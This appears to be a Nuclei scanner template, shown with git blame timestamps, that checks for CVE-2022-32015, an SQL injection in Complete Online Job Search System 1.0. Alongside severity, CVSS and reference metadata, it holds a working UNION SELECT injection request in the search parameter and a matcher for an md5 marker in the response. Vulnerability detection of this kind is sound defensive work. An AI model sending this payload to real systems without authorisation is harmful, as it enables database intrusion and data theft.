2022-07-16 20:27:26 +00:00
id : CVE-2022-32015
info :
2022-09-29 13:38:41 +00:00
name : Complete Online Job Search System 1.0 - SQL Injection
2022-07-16 20:27:26 +00:00
author : arafatansari
2022-09-29 13:52:24 +00:00
severity : high
2022-07-16 20:27:26 +00:00
description : |
2022-09-29 13:38:41 +00:00
Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/index.php?q=category&search=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
2022-07-16 20:27:26 +00:00
reference :
- https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-8.md
2022-07-18 12:53:16 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-32015
2022-07-18 14:51:15 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score : 7.2
cve-id : CVE-2022-32015
cwe-id : CWE-89
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:*:*:*:*:*:*:*:*
epss-score : 0.00458
2022-07-18 12:54:36 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-06-04 08:13:42 +00:00
verified : true
2022-07-18 12:53:16 +00:00
tags : cve,cve2022,sqli,jobsearch
variables :
num : "999999999"
2022-07-16 20:27:26 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-07-18 12:53:16 +00:00
- method : GET
path :
- "{{BaseURL}}/index.php?q=category&search=Banking%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,md5({{num}}),15,16,17,18,19--+"
2022-07-16 20:27:26 +00:00
matchers :
- type : word
part : body
words :
2022-07-18 12:53:16 +00:00
- '{{md5({{num}})}}'
2022-09-29 13:38:41 +00:00
# Enhanced by mp on 2022/09/28